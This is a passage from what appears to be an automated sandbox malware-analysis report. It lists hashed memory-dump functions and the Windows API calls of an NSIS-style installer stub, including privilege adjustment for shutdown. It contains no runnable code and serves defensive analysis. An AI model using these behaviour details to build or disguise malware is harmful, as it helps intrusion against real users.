                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4df9335895382bea5a965927a3d3ea618e81e50ede603f2349b1ad215979067f
                                                                                                            • Instruction ID: fe6778b95d6e86353047b030b0f505cb578cbe4797a171d9fde4535a5c70d992
                                                                                                            • Opcode Fuzzy Hash: 4df9335895382bea5a965927a3d3ea618e81e50ede603f2349b1ad215979067f
                                                                                                            • Instruction Fuzzy Hash: F3F0E21030C3806BE70266BD1861B6B7FEA9FCB241B0840B6E542DB292DE54AD1553F2
                                                                                                            Function 384E9478 Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55edcbac5cd21214bb2113b7b1ad68115ac888c59b8641e3b756f3d5419de48a
                                                                                                            • Instruction ID: 71ca532b889507b5024616b760a81427d85ac03220feef8ded4efb25ffa739bc
                                                                                                            • Opcode Fuzzy Hash: 55edcbac5cd21214bb2113b7b1ad68115ac888c59b8641e3b756f3d5419de48a
                                                                                                            • Instruction Fuzzy Hash: D1F0B43142C348CFE202DBF898946C53F64AF4531EF6100DEE0D11BD56EA12BC588767
                                                                                                            Function 384E9608 Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 46bae7c63d6141f8531da4431c172cb053683e404be76afb3c12fd7c59515536
                                                                                                            • Instruction ID: ea06e5d4d2b5cdb86e1242af14df7cecc8f263c89b9ae513b3b0e4e2e1edbe7c
                                                                                                            • Opcode Fuzzy Hash: 46bae7c63d6141f8531da4431c172cb053683e404be76afb3c12fd7c59515536
                                                                                                            • Instruction Fuzzy Hash: 68F0A020348315A7EA046AED4415B2B775A9BD5252B10843AF502D6B40DEA5AC0603F6
                                                                                                            Function 0015B158 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da33a8fe946f631774d448eeb3150d28e33dbcbb26f0cab15f6a76b4f6ced4f3
                                                                                                            • Instruction ID: 7ce5dd460b20524b3ee8ea6aa1bc9270369c55696219275ce8eca26a784d2a9f
                                                                                                            • Opcode Fuzzy Hash: da33a8fe946f631774d448eeb3150d28e33dbcbb26f0cab15f6a76b4f6ced4f3
                                                                                                            • Instruction Fuzzy Hash: 64E0CA32425F06CBF3002F30ACAC32ABBA1FB0B313F816E10A00A82431AB7895448A48
                                                                                                            Function 0015FE10 Relevance: .0, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20c5de74a62ab730edd308af7a55f7b9af530bcbf7a3f0a8270d08b02e354abd
                                                                                                            • Instruction ID: 2c73dea52aec403af639ecb4e2e2a3d22119734503c51392817459d630b59653
                                                                                                            • Opcode Fuzzy Hash: 20c5de74a62ab730edd308af7a55f7b9af530bcbf7a3f0a8270d08b02e354abd
                                                                                                            • Instruction Fuzzy Hash: 40F08C34904708DFCB04EFB4E84968C7BB5EB49302F9181BACC2AA3261E7308E46DB40
                                                                                                            Function 0015FC38 Relevance: .0, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 43bb10305a1482832357f5d0df76f1888a999fb88be9b2727f510ee9d3d47134
                                                                                                            • Instruction ID: 4a730996fb3c99c86d910292422f67d26f9217c5fc5ed7503f6cdfb074ff0fdc
                                                                                                            • Opcode Fuzzy Hash: 43bb10305a1482832357f5d0df76f1888a999fb88be9b2727f510ee9d3d47134
                                                                                                            • Instruction Fuzzy Hash: 8EF03975951208CFCB84CFA0D4445E87B72EB8A312BA00069DA15BA250C7368C87CB68
                                                                                                            Function 00151877 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e6c365e06f32707804780505c5fa8f88137818cbfa278eb957ef44482a0e5b9f
                                                                                                            • Instruction ID: 1210e5b2858770e9714feda90f6f508f06b075233296e598d86298bb69301048
                                                                                                            • Opcode Fuzzy Hash: e6c365e06f32707804780505c5fa8f88137818cbfa278eb957ef44482a0e5b9f
                                                                                                            • Instruction Fuzzy Hash: E0E01A35D513668EC712AFB4D8144EEBF74FE93710B4642A7D054AB094EB301A9ECB71
                                                                                                            Function 0015FF21 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e0c3b63618425e9774796ba67c49dece430dae0c24e1d3b05c97648d23d9817
                                                                                                            • Instruction ID: 109f2d3725b5f79d1f69e153855decff3122109a6286dc5ceec07d0ebb0d5037
                                                                                                            • Opcode Fuzzy Hash: 5e0c3b63618425e9774796ba67c49dece430dae0c24e1d3b05c97648d23d9817
                                                                                                            • Instruction Fuzzy Hash: 55E0D83150D3C99FDF12EF719C19A94BF38AB43206F4845EED81567853CB304959C79A
                                                                                                            Function 0015FE20 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f248989ab6a812734be62c7f311ae20af0e82850c76415bb675edb3f4c5d93a5
                                                                                                            • Instruction ID: 502bff527ebe41d03c0502b30b60345c82b3cf01a1ad93e820bac7cb8510f653
                                                                                                            • Opcode Fuzzy Hash: f248989ab6a812734be62c7f311ae20af0e82850c76415bb675edb3f4c5d93a5
                                                                                                            • Instruction Fuzzy Hash: 27E06D34D04208DFCB04DFB8D44969CBBB5EB49302F6040A98814A3250E7305E45CB40
                                                                                                            Function 384E9438 Relevance: .0, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 271e4ce7b40ed3f0583af2f3d9594c122609692fca2bc723ab693e53652ef26a
                                                                                                            • Instruction ID: 7537188f7ec9118e42e87db8e6bd9053fcb125a5ad65b8988e06c4ade8f3c689
                                                                                                            • Opcode Fuzzy Hash: 271e4ce7b40ed3f0583af2f3d9594c122609692fca2bc723ab693e53652ef26a
                                                                                                            • Instruction Fuzzy Hash: B4E0C23602C344CFE3029B7DCC547897B38BF4670AF2110CBE4415FA62DA22BC088696
                                                                                                            Function 00151888 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b62b666e2c3b51bdaee4046e600d36fb89607a002e81573755c9bf9bdd280f40
                                                                                                            • Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
                                                                                                            • Opcode Fuzzy Hash: b62b666e2c3b51bdaee4046e600d36fb89607a002e81573755c9bf9bdd280f40
                                                                                                            • Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1
                                                                                                            Function 384ED095 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0aa57bcd1a34f3ab3e91c4d725c9faeadaed2f6b88d99f00519aea524c005a28
                                                                                                            • Instruction ID: a2f8177471122302f8226027c2c1ba1872dbcc03bfd731c1e5bbc6d26b7c2ce2
                                                                                                            • Opcode Fuzzy Hash: 0aa57bcd1a34f3ab3e91c4d725c9faeadaed2f6b88d99f00519aea524c005a28
                                                                                                            • Instruction Fuzzy Hash: 71D05E2251E6A01FD71682287C15C99AF7909CA12034946FBF058CB0E69A855A4A838A
                                                                                                            Function 384ECF30 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 890af9b9b41409670e97988151123f3d781520df4d8b0c599fa13258ebfc677b
                                                                                                            • Instruction ID: 14ec92016fa34d916be95de8d039b7a46acb4fbffe5ed7baecf53ba6b5cbac09
                                                                                                            • Opcode Fuzzy Hash: 890af9b9b41409670e97988151123f3d781520df4d8b0c599fa13258ebfc677b
                                                                                                            • Instruction Fuzzy Hash: 41D05E3120C2C08FC7138774E8605C47FB05F5B20075D12CAD085DFD73C15AA808C781
                                                                                                            Function 001556FF Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02d64f5866806395eb1af97d19dc33c4579059ee6268d4b1034070d7ae363102
                                                                                                            • Instruction ID: d79f677e8c082fc11b28827c00b4ba0d62d7e746c6fb57e0a1bea206f18fa941
                                                                                                            • Opcode Fuzzy Hash: 02d64f5866806395eb1af97d19dc33c4579059ee6268d4b1034070d7ae363102
                                                                                                            • Instruction Fuzzy Hash: F7D02B3100C3484FC216F7709CD5586772BA780100B808511D1445766BEF746BD68B63
                                                                                                            Function 00159F6D Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6fd17419a677f90cba46bde992bdae25f94934703a247d32e079e18e1fefad2
                                                                                                            • Instruction ID: f7599aea6b521f7ce576de9e2ec7c22d477ddcd7ef33663343420c7dc07b33ee
                                                                                                            • Opcode Fuzzy Hash: d6fd17419a677f90cba46bde992bdae25f94934703a247d32e079e18e1fefad2
                                                                                                            • Instruction Fuzzy Hash: D7D0673AB00009AFCB059F98EC809DDF776FB98221B048116F915A3260C6319965DB50
                                                                                                            Function 384E95D8 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 860324745a0e0adc055c87cab5708bc96185accb5101a0ef2f44faea38e072e1
                                                                                                            • Instruction ID: d78005b8e44d5efde10ccb2bf6b86ada17c5db4df88182a57970eff9a54ed90c
                                                                                                            • Opcode Fuzzy Hash: 860324745a0e0adc055c87cab5708bc96185accb5101a0ef2f44faea38e072e1
                                                                                                            • Instruction Fuzzy Hash: BFC08033309710975E35E76DF8405CE57958EC9212714CD3FF045C75445D50AD4B41C5
                                                                                                            Function 0015FF30 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b575510537275747390df6de444fb820969cde146a6ce71027acbbda274a48d
                                                                                                            • Instruction ID: f4b2855b815a4d40e17489798b74c7388adbda1e24d92b207045e203ec9121bc
                                                                                                            • Opcode Fuzzy Hash: 4b575510537275747390df6de444fb820969cde146a6ce71027acbbda274a48d
                                                                                                            • Instruction Fuzzy Hash: 9FD0227080420CDFC704DFA0E809BA9B37CEB03303F0000ACA81823210CBB00D00C788
                                                                                                            Function 384EBD48 Relevance: .0, Instructions: 13COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c26d75b2c9e004be6eaa7002b7b5271a6d8ba475b55e5218995b95ebb4ca2d0f
                                                                                                            • Instruction ID: 69fb3cc54c07aca209800393dbc2669614e77377777ba01a044722f210f85451
                                                                                                            • Opcode Fuzzy Hash: c26d75b2c9e004be6eaa7002b7b5271a6d8ba475b55e5218995b95ebb4ca2d0f
                                                                                                            • Instruction Fuzzy Hash: 59C01274442E098BE6082B60AC0CB39B2A8BB07303FC82910A008128308BB854148648
                                                                                                            Function 384E94B4 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d4b044d4315e19b9f9ec5f561de0fd4feba925d6df306caa4388c250683a6acb
                                                                                                            • Instruction ID: f4118c15f671343d51795081cd575ec5c00f853918ec0ca862e658bef72e36de
                                                                                                            • Opcode Fuzzy Hash: d4b044d4315e19b9f9ec5f561de0fd4feba925d6df306caa4388c250683a6acb
                                                                                                            • Instruction Fuzzy Hash: D2C08C30278304CFE200AB5DC884A0133ACFF89B08F2058E0F0158BA61CB22FC004A05
                                                                                                            Function 00155710 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab41a2740e7bc486d67e1cde8daaaa86ead2778cdb98eb262cd3103ff891a407
                                                                                                            • Instruction ID: 64c0fa35aefa8860aebbe9247bb20ec449cfc69d7330e4377586bfffce43f68a
                                                                                                            • Opcode Fuzzy Hash: ab41a2740e7bc486d67e1cde8daaaa86ead2778cdb98eb262cd3103ff891a407
                                                                                                            • Instruction Fuzzy Hash: 28C012300083088BD505E7A1DC96555332B67801007C0D510A2055666BEFB469E64B96
                                                                                                            Function 0015FFB8 Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 78a1f5d72b3bc7bcae80da2010768bc5dff8b9bf171ae00c8a24816d6cb94727
                                                                                                            • Instruction ID: 35382793d18856e569077b7bd074a3fc80c5e114d674d7ea614cc416c62d6094
                                                                                                            • Opcode Fuzzy Hash: 78a1f5d72b3bc7bcae80da2010768bc5dff8b9bf171ae00c8a24816d6cb94727
                                                                                                            • Instruction Fuzzy Hash: A5C08C3E204103D78A0FC710849092BFB529BD5282F28C81DB49011224CA258C2289A1

                                                                                                            Non-executed Functions

                                                                                                            Function 004034A5 Relevance: 75.7, APIs: 32, Strings: 11, Instructions: 410stringfilecomCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-334447862
                                                                                                            • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
